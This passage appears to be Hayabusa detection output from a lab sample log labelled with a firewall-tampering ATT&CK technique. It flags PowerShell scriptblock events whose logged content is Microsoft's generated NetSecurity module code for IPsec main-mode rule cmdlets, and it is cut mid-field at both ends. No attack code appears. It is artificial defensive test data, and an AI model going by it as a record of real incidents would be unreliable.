[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(Para",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(Para",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param(",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"meterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') 